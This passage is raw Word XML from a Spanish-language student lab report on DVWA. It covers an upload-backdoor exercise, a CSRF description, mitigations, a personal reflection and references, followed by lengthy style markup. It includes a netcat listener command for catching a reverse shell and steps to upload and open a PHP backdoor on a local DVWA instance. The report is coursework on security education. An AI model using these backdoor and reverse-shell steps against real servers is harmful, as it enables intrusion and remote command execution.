                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5401310" cy="3375660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70644A33">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@kali:~$ nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B1C566">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 4 — Subir el archivo por el formulario DVWA y acceder a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68673788">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dvwa/hackable/uploads/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>danielaguirre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615A430">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>. Propuesta de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D9626">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lista blanca de extensiones: permitir solo .jpg, .png, .gif.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C97514">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Renombrar archivos con nombre aleatorio al guardar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF90F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B41E1E"/>
        </w:rPr>
        <w:t>Vulnerabilidad 4 — CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2C679">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>1. Descripción de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E740349">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CSRF es un ataque en el que el atacante induce a una víctima autenticada a realizar una acción no deseada en una aplicación web. El navegador envía automáticamente las cookies de sesión con cada solicitud, por lo que la aplicación cree que la petición es legítima aunque haya sido forjada desde otro sitio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1718D9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2. Causas de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF1DCEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a. Ausencia de validaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69386ACB">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>b. Errores de lógica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E696EE8">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La aplicación no exige que la petición provenga del propio sitio ni que el usuario haya iniciado explícitamente la acción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C423CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c. Manejo inadecuado de entradas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B473638">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Los parámetros sensibles viajan en la URL (método GET), facilitando la construcción de enlaces maliciosos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A7376">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>3. Mecanismo de ataque — Cambio de contraseña de la víctima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71610F8E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-MX" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mostrar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">el proceso para falsificar una petición en sitios cruzados que le permita </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705C83D9">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>modificar un dato, parámetro, configuración o credencial de la víctima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1EC784"/>
    <w:p w14:paraId="7BE6B089"/>
    <w:p w14:paraId="7A20F643">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E5A3C"/>
        </w:rPr>
        <w:t>Reflexión Personal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701728CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Durante el desarrollo de este laboratorio,  sobre la plataforma DVWA, se evidenció de manera práctica cómo vulnerabilidades aparentemente simples pueden derivar en compromisos críticos de la seguridad de un sistema real.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El XSS Reflejado y el XSS Almacenado se originan en la misma causa raíz: confiar en el input del usuario sin codificación de salida. Sin embargo, el impacto del XSS Almacenado es significativamente mayor por su persistencia y escala, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>El laboratorio de Upload Backdoor fue el de mayor impacto tangible: en cuestión de minutos se obtuvo ejecución remota de comandos sobre el servidor víctima, lo que en un entorno productivo implicaría el compromiso total del sistema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En términos de aplicabilidad profesional, estas prácticas refuerzan la importancia de integrar la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eguridad desde las etapas tempranas del desarrollo y educar a los equipos de desarrollo en los principios de OWASP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C65FBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E3C5A"/>
        </w:rPr>
        <w:t>Referencias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C17E1DF">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OWASP Foundation. (2021). OWASP Top Ten 2021. https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F964D58">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE Corporation. (2024). CWE-79: Cross-site Scripting. </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2335CC9D">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stuttard, D., &amp; Pinto, M. (2011). The Web Application Hacker's Handbook. Wiley.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACAF89F">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Durán Vásquez, J. M. (2026). Guía de Trabajo Práctico No. 1. ITM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B58EFD">
      <w:pPr>
        <w:jc w:val="center"/>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4"/>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2"/>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7"/>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30"/>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5"/>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9"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>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CB61B4C"/>
    <w:rsid w:val="59C903C5"/>
    <w:rsid w:val="5D923490"/>
    <w:rsid w:val="5F891239"/>
    <w:rsid w:val="656E29F6"/>
    <w:rsid w:val="6C7465CE"/>
    <w:rsid w:val="796A0F4F"/>
    <w:rsid w:val="7D194BB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2"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="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Strong"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="List Continue 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:p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macro"/>
    <w:link w:val="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8">
    <w:name w:val="List Continue 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1080"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="List Continue"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="47"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="List 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="1080" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="List Number 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="37"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="24">
    <w:name w:val="List Number 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="26">
    <w:name w:val="List 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="720" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="27">
    <w:name w:val="List Bullet 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="28">
    <w:name w:val="List"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="360" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="29">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="30">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="38"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="32">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="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3">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="46"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="34">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="48"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="35">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="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37">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="23"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="31"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="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40">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41">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2">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3">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="35"/>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4">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="32"/>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45">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="33"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="Body Text 2 Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="Body Text 3 Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="34"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="Macro Text Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="17"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="50">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="51"/>
    <w:qFormat/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">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3">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54">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55">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56">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57">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58">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="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59">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="58"/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="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61">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="21"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="31"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="C0504D" w:themeColor="accent2"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent2"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="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4">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="33"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="65">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="66">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styleId="67">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68">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69">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0">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1">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2">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3">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74">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5">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76">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77">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78">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79">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0">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81">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2">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3">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4">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5">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86">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87">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styleId="88">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89">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0">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1">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2">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3">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4">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5">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6">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7">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8">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9">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styleId="102">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3">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4">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05">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06">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07">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08">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styleId="109">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110">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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="111">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112">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113">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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
